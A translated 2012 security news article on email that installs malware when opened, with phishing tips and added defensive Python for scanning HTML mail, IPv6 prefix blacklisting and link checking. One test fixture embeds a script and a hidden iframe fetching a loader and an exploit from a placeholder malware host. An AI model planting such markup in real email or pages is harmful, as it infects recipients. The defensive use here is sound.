New Drive-By Malware Spam Infects Upon Opening Email

Wednesday, February 01, 2012

Plagiarist Paganini


(Translated from the original Italian)

The threat is a customized attack that uses email as the vector for spreading malware.

Until now, the typical infection scenario has required an unsuspecting user to click a link in the body of an email, which starts the malware download, or to open an agent attached directly to the email.

Unfortunately, that is not the only way to infect a remote PC: attackers have developed a way to infect a system through email that requires no action from the user beyond opening the message.

According to an announcement from researchers at Eleven, a German security firm, it is sufficient that the message merely be opened in the email client for the target to be infected, with no click on a link and no opened attachment.

Eleven's researchers said that the new attack uses JavaScript embedded in an HTML email and needs no further user interaction. Once the email is opened and the HTML is rendered, the script attempts to scan the user's computer and download the malware while displaying a "Loading... please wait" message.

The researchers say the mechanism is the same one used to infect a PC when a user opens a compromised web site in a browser:

"This is similar to so-called drive-by downloads, which infect a PC by opening an infected website in the browser."

The easiest way to avoid this malware spam attack is to deactivate the display of HTML emails in your mail client.

The "drive-by spam" attacks observed use emails with the common subject header "Banking Security Update" and a sender address from a fixed domain. If the email client allows HTML emails to be displayed, the HTML code is activated immediately.

If you receive an email with the subject "Banking Security Update" or something similar, take every precaution before opening it at all, and consider setting your client to display emails in plain-text format only.
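The two defensive points above (spot HTML mail that does something as soon as it is rendered, and show the user plain text instead) can be checked at a mail gateway before the message reaches a client. The following is an added example, not code from eleven or from the article: it parses a raw message, reports active content in any text/html part, flags the subject eleven reported, and produces the view a plain-text-only client would show. The two sample messages are constructed for illustration; every address and URL in them uses the reserved .invalid top-level domain.

```python
"""Gateway-side scan for 'drive-by spam': HTML mail carrying active content.

Added example, not code from eleven or from the article.  Both .eml messages
below are constructed; every address and URL in them is a placeholder.
"""
import email
import re
from email import policy
from html.parser import HTMLParser

# Tags that load or run content as soon as the HTML is rendered.  A current
# client should ignore <script> in mail, but frames and objects are the other
# usual drive-by vehicles, so all of them are reported.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
SUSPICIOUS_SUBJECTS = ("banking security update",)   # subject eleven reported


class _ActiveContentFinder(HTMLParser):
    """Collects active-content findings and the visible text of one HTML body."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.text = []
        self._skip = False          # True while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "style"):
            self._skip = True
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> src={attrs.get('src')!r}")
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(f"<meta refresh> content={attrs.get('content')!r}")
        for name, value in attrs.items():
            if name.startswith("on"):                               # onload=, onerror=
                self.findings.append(f"<{tag} {name}> inline event handler")
            elif (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"<{tag} {name}> javascript: URL")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def scan_message(raw):
    """Parse a raw RFC 5322 message and report what would fire on display."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject = (msg["subject"] or "").lower()
    result = {"subject_flag": any(s in subject for s in SUSPICIOUS_SUBJECTS),
              "has_plain_part": False, "html_findings": []}
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "text/plain":
            result["has_plain_part"] = True
        elif ctype == "text/html":
            finder = _ActiveContentFinder()
            finder.feed(part.get_content())
            result["html_findings"].extend(finder.findings)
    return result


def plain_text_view(raw):
    """What a client set to 'plain text only' shows: the text/plain part if there
    is one, otherwise the HTML body with tags, scripts and styles stripped."""
    msg = email.message_from_string(raw, policy=policy.default)
    plain = msg.get_body(preferencelist=("plain",))
    if plain is not None:
        return plain.get_content().strip()
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is None:
        return ""
    finder = _ActiveContentFinder()
    finder.feed(html_part.get_content())
    return re.sub(r"\s+", " ", " ".join(finder.text)).strip()


# Constructed sample 1: an HTML-only message in the style eleven described.
SAMPLE_DRIVE_BY = """\
From: "Online Banking" <alerts@bank.invalid>
To: victim@mail.invalid
Subject: Banking Security Update
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Loading... please wait</p>
<script src="http://malware.invalid/loader.js"></script>
<iframe src="http://malware.invalid/exploit.html" width="0" height="0"></iframe>
</body></html>
"""

# Constructed sample 2: a benign multipart/alternative message.
SAMPLE_BENIGN = """\
From: statements@bank.invalid
To: victim@mail.invalid
Subject: Monthly statement available
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your statement is ready. Log in at the usual address.
--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Your statement is ready. Log in at the usual address.</p></body></html>
--b1--
"""
```

For the first sample, `scan_message` flags the subject and reports the `<script>` and `<iframe>` elements, and `plain_text_view` reduces the body to "Loading... please wait", which is all the user would ever have needed to see. For the second, nothing is flagged and the text/plain alternative is shown as-is. The scanner only reads the HTML; it does not evaluate JavaScript, so obfuscated loaders inside a `<script>` body are reported by the tag, not by their behaviour.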

The increasing use of email makes it ever harder to tell whether a message is legitimate or counterfeit, and with the introduction of IPv6, blacklist-based anti-spam solutions will become nearly obsolete.

According to eleven, “The significant expansion of the address space allows for the use of throwaway addresses, which will be used only once for spamming.”

The blacklist concept relies on identifying addresses that are used repeatedly for spamming; under IPv6 this no longer works, because the address space gives an attacker so many addresses that each one can be used once and then discarded.
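The following added example (not from the article or from eleven) shows the effect in numbers and goes one step beyond the text to the usual mitigation: list the prefix a sender comes from rather than the individual address. The sender addresses are constructed inside 2001:db8::/32, the IPv6 documentation prefix, and the functions assume IPv6 input.

```python
"""Why a per-address blacklist fails on IPv6, and the prefix-based alternative.

Added example, not from the article or from eleven.  The sender addresses are
constructed inside 2001:db8::/32 (documentation prefix); IPv6 input assumed.
"""
import ipaddress
from collections import Counter


def aggregate(addresses, prefixlen=64):
    """Count senders per enclosing prefix instead of per individual address."""
    counts = Counter()
    for a in addresses:
        counts[str(ipaddress.ip_network(f"{a}/{prefixlen}", strict=False))] += 1
    return counts


def listing_sizes(addresses):
    """Entries a blacklist needs under each strategy: per host, per /64, per /48."""
    hosts = {str(ipaddress.ip_address(a)) for a in addresses}
    return {"host": len(hosts),
            "/64": len(aggregate(addresses, 64)),
            "/48": len(aggregate(addresses, 48))}


def is_listed(address, listed_prefixes):
    """Prefix-based lookup: a fresh throwaway address in a listed /64 is still caught."""
    ip = ipaddress.ip_address(address)
    return any(ip in ipaddress.ip_network(p) for p in listed_prefixes)


def constructed_spam_sources():
    """One spammer burning 5000 one-shot addresses inside a single /64 (the
    throwaway trick eleven describes) plus a second source in a different /48."""
    rotating = [f"2001:db8:1:2::{i:x}" for i in range(1, 5001)]
    other = ["2001:db8:99::1", "2001:db8:99::2"]
    return rotating + other
```

A per-host list grows by one entry per message sent, 5002 here, and never matches the next address the spammer picks; listing the two /64 prefixes catches every address in them, including ones not yet seen. The caveat is collateral damage: a /64 is commonly a single customer's assignment, and a /48 can be a whole site, so prefix listing should be driven by the prefix's behaviour over time, not by a single hit.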

What are the simple rules to follow to avoid being the victim of this type of fraud?

Ignore e-mails that ask for confidential data!

In general, banks, credit card companies and online payment services do not send e-mails that link to a page on which you should enter your account information. Delete the e-mail immediately and do not click on the link! Merely visiting the site may lead to an infection with a virus or Trojan (a drive-by download).

Check whether the site is secure! 

Check to see where the link actually leads before clicking.

Pay attention to the exact spelling of the URL! 

Always make sure that the URL is correct (including the one in the e-mail's sender header) and check it for spelling errors! Also check that the URL is the one the company normally uses, by comparing it with the company's site or with a genuine e-mail.

Account and credit card phishing are not the only dangers!

Alleged e-mails from Facebook or Hotmail can be just as dangerous as those from your bank.
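The two link rules above, checking where a link actually leads and checking the spelling of the domain, can be applied mechanically to an HTML message before anyone clicks. The following is an added example, not code from the article: it pairs each link's real target with the text the user sees, and compares the target's registrable domain against a list of domains you trust. The HTML fragment and the trusted domain are constructed; mybank.example stands in for a real bank's domain, and the "last two labels" rule used for the registrable domain is a simplification of a Public Suffix List lookup.

```python
"""Link checks for phishing mail: does the link lead where it claims to, and
is the target a look-alike of a domain you actually trust?

Added example, not from the article.  Sample HTML and trusted domain are
constructed; mybank.example stands in for a real bank domain.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Pairs every <a href> with the text the user actually sees."""

    def __init__(self):
        super().__init__()
        self.links = []             # (href, visible text)
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    """Hostname of a URL; bare hostnames in link text are accepted too."""
    parsed = urlparse(url if "://" in url else "http://" + url)
    return (parsed.hostname or "").lower()


def _registrable(host):
    """Last two labels.  Crude stand-in for a Public Suffix List lookup."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def _edit_distance(a, b):
    """Levenshtein distance, for catching one- or two-character misspellings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_links(html, trusted_domains):
    """Return (href, reason) for every link that fails one of the two rules."""
    collector = _LinkCollector()
    collector.feed(html)
    problems = []
    for href, text in collector.links:
        href_host = _host(href)
        href_reg = _registrable(href_host)
        # Rule 1: the visible text names a host other than the real target.
        if "." in text and " " not in text:
            shown = _host(text)
            if shown and _registrable(shown) != href_reg:
                problems.append((href, f"shows {shown} but leads to {href_host}"))
                continue
        # Rule 2: the target is a look-alike of a trusted domain.
        for good in trusted_domains:
            if href_reg == good:
                break                                   # genuinely the trusted site
            brand = good.split(".")[0]
            if brand in href_host:                      # brand buried in another domain
                problems.append((href, f"contains '{brand}' but is not {good}"))
                break
            if _edit_distance(href_reg, good) <= 2:     # typo-squat
                problems.append((href, f"look-alike of {good}"))
                break
    return problems


# Constructed phishing fragment: a misleading link, a typo-squat, and a genuine link.
SAMPLE_HTML = """
<p>Dear customer, please confirm your account:</p>
<a href="http://mybank.example.login-verify.invalid/">https://www.mybank.example/login</a>
<a href="http://mybanc.example/">Click here</a>
<a href="https://www.mybank.example/help">Help centre</a>
"""
TRUSTED = ["mybank.example"]
```

Run against the sample, `check_links` reports the first link (the text shows www.mybank.example but the target's registrable domain is login-verify.invalid) and the second (mybanc.example is one edit away from mybank.example), and passes the third. The edit-distance threshold of 2 is deliberately generous for short domains; in practice you would tune it per domain length and rely on an allow-list for the handful of brands you actually deal with.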


Cross-posted from Security Affairs
